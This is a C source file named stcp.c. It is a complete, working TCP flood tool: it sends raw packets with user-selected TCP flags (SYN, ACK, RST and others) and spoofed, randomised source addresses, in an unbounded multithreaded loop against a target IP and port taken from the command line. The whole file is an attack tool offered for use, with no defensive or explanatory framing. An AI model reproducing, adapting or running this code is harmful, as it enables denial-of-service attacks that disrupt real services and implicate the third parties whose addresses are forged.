stcp.c

1. /*
2.  * This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
3.  */
4.  
5. #include <unistd.h>
6. #include <time.h>
7. #include <sys/types.h>
8. #include <sys/socket.h>
9. #include <sys/ioctl.h>
10. #include <string.h>
11. #include <stdlib.h>
12. #include <stdio.h>
13. #include <pthread.h>
14. #include <netinet/tcp.h>
15. #include <netinet/ip.h>
16. #include <netinet/in.h>
17. #include <netinet/if_ether.h>
18. #include <netdb.h>
19. #include <net/if.h>
20. #include <arpa/inet.h>
21. #define MAX_PACKET_SIZE 4096
22. #define PHI 0x9e3779b9
23. static unsigned long int Q[4096], c = 362436;
24. static unsigned int floodport;
25. volatile int limiter;
26. volatile unsigned int pps;
27. volatile unsigned int sleeptime = 100;
28. int ack,syn,psh,fin,rst,urg,ptr,res2,seq;
29. void init_rand(unsigned long int x)
30. {
31.     int i;
32.     Q[0] = x;
33.     Q[1] = x + PHI;
34.     Q[2] = x + PHI + PHI;
35.     for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
36. }
37. unsigned long int rand_cmwc(void)
38. {
39.     unsigned long long int t, a = 18782LL;
40.     static unsigned long int i = 4095;
41.     unsigned long int x, r = 0xfffffffe;
42.     i = (i + 1) & 4095;
43.     t = a * Q[i] + c;
44.     c = (t >> 32);
45.     x = t + c;
46.     if (x < c) {
47.     x++;
48.     c++;
49.     }
50.     return (Q[i] = r - x);
51. }
52. unsigned short csum (unsigned short *buf, int count)
53. {
54.     register unsigned long sum = 0;
55.     while( count > 1 ) { sum += *buf++; count -= 2; }
56.     if(count > 0) { sum += *(unsigned char *)buf; }
57.     while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
58.     return (unsigned short)(~sum);
59. }
60. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
61.  
62.     struct tcp_pseudo
63.     {
64.     unsigned long src_addr;
65.     unsigned long dst_addr;
66.     unsigned char zero;
67.     unsigned char proto;
68.     unsigned short length;
69.     } pseudohead;
70.     unsigned short total_len = iph->tot_len;
71.     pseudohead.src_addr=iph->saddr;
72.     pseudohead.dst_addr=iph->daddr;
73.     pseudohead.zero=0;
74.     pseudohead.proto=IPPROTO_TCP;
75.     pseudohead.length=htons(sizeof(struct tcphdr));
76.     int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
77.     unsigned short *tcp = malloc(totaltcp_len);
78.     memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
79.     memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
80.     unsigned short output = csum(tcp,totaltcp_len);
81.     free(tcp);
82.     return output;
83. }
84. void setup_ip_header(struct iphdr *iph)
85. {
86.     iph->ihl = 5;
87.     iph->version = 4;
88.     iph->tos = 0;
89.     iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
90.     iph->id = htonl(rand()%54321);
91.     iph->frag_off = 0;
92.     iph->ttl = MAXTTL;
93.     iph->protocol = 6;
94.     iph->check = 0;
95.     iph->saddr = inet_addr("8.8.8.8");
96. }
97. void setup_tcp_header(struct tcphdr *tcph)
98. {
99. tcph->source = htons(rand()%65535);
100.     tcph->seq = rand();
101.     tcph->ack  = ack;
102.     tcph->ack_seq = seq;
103.     tcph->psh  = psh;  
104.     tcph->fin  = fin;
105.     tcph->rst  = rst;
106.     tcph->res2 = res2;
107.     tcph->doff = 5;
108.     tcph->syn = syn;
109.     tcph->urg  = urg;
110.     tcph->urg_ptr = ptr;
111.     tcph->window = rand();
112.     tcph->check = 0;
113. }
114. void *flood(void *par1)
115. {
116.     char *td = (char *)par1;
117.     char datagram[MAX_PACKET_SIZE];
118.     struct iphdr *iph = (struct iphdr *)datagram;
119.     struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
120.     struct sockaddr_in sin;
121.     sin.sin_family = AF_INET;
122.     sin.sin_port = htons(floodport);
123.     sin.sin_addr.s_addr = inet_addr(td);
124.     int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
125.     if(s < 0){
126.     fprintf(stderr, "Could not open raw socket.\n");
127.     exit(-1);
128.     }
129.     memset(datagram, 0, MAX_PACKET_SIZE);
130.     setup_ip_header(iph);
131.     setup_tcp_header(tcph);
132.     tcph->dest = htons(floodport);
133.     iph->daddr = sin.sin_addr.s_addr;
134.     iph->check = csum ((unsigned short *) datagram, iph->tot_len);
135.     int tmp = 1;
136.     const int *val = &tmp;
137.     if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
138.     fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
139.     exit(-1);
140.     }
141.     init_rand(time(NULL));
142.     register unsigned int i;
143.     i = 0;
144.     while(1){
145.     sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
146.     iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
147.     iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
148.     iph->check = csum ((unsigned short *) datagram, iph->tot_len);
149.     tcph->seq = rand_cmwc() & 0xFFFF;
150.     tcph->source = htons(rand_cmwc() & 0xFFFF);
151.     tcph->check = 0;
152.     tcph->check = tcpcsum(iph, tcph);
153.     pps++;
154.     if(i >= limiter)
155.     {
156.     i = 0;
157.     usleep(sleeptime);
158.     }
159.     i++;
160.     }
161. }
162. int main(int argc, char *argv[ ])
163. {
164.     if(argc < 7){
165.     fprintf(stderr, "Invalid parameters!\n");
166.     fprintf(stdout, "Usage: %s <target IP> <port> <threads> <pps limiter, -1 for no limit> <time> <ack,syn,psh,fin,rst,urg,ptr,res2,seq>\n", argv[0]);
167.     exit(-1);
168.     }
169.     fprintf(stdout, "Opening sockets...\n");
170.     int num_threads = atoi(argv[3]);
171.     floodport = atoi(argv[2]);
172.     int maxpps = atoi(argv[4]);
173.     limiter = 0;
174.     pps = 0;
175.     pthread_t thread[num_threads];
176.     if(strstr(argv[6], "ack"))
177.     ack  = 1;
178.     else
179.     ack  = 0;
180.     if(strstr(argv[6], "seq"))
181.     seq = 1;
182.     else
183.     seq = 0;
184.     if(strstr(argv[6], "psh"))
185.     psh = 1;
186.     else
187.     psh = 0;
188.     if(strstr(argv[6], "fin"))
189.     fin  = 1;
190.     else
191.     fin  = 0;
192.     if(strstr(argv[6], "rst"))
193.     rst = 1;
194.     else
195.     rst = 0;
196.     if(strstr(argv[6], "res2"))
197.     res2 = 1;
198.     else
199.     res2 = 0;
200.     if(strstr(argv[6], "syn"))
201.     syn = 1;
202.     else
203.     syn = 0;
204.     if(strstr(argv[6], "urg"))
205.     urg = 1;
206.     else
207.     urg = 0;
208.     if(strstr(argv[6], "ptr"))
209.     ptr = 1;
210.     else
211.     ptr = 0;
212.     int multiplier = 20;
213.     int i;
214.     for(i = 0;i<num_threads;i++){
215.     pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
216.     }
217.     fprintf(stdout, "Sending attack...\n");
218.     for(i = 0;i<(atoi(argv[5])*multiplier);i++)
219.     {
220.         usleep((1000/multiplier)*1000);
221.         if((pps*multiplier) > maxpps)
222.         {
223.             if(1 > limiter)
224.             {
225.                 sleeptime+=100;
226.             } else {
227.                 limiter--;
228.             }
229.         } else {
230.             limiter++;
231.             if(sleeptime > 25)
232.             {
233.                 sleeptime-=25;
234.             } else {
235.                 sleeptime = 0;
236.             }
237.         }
238.         pps = 0;
239.     }
240.  
241.     return 0;
242. }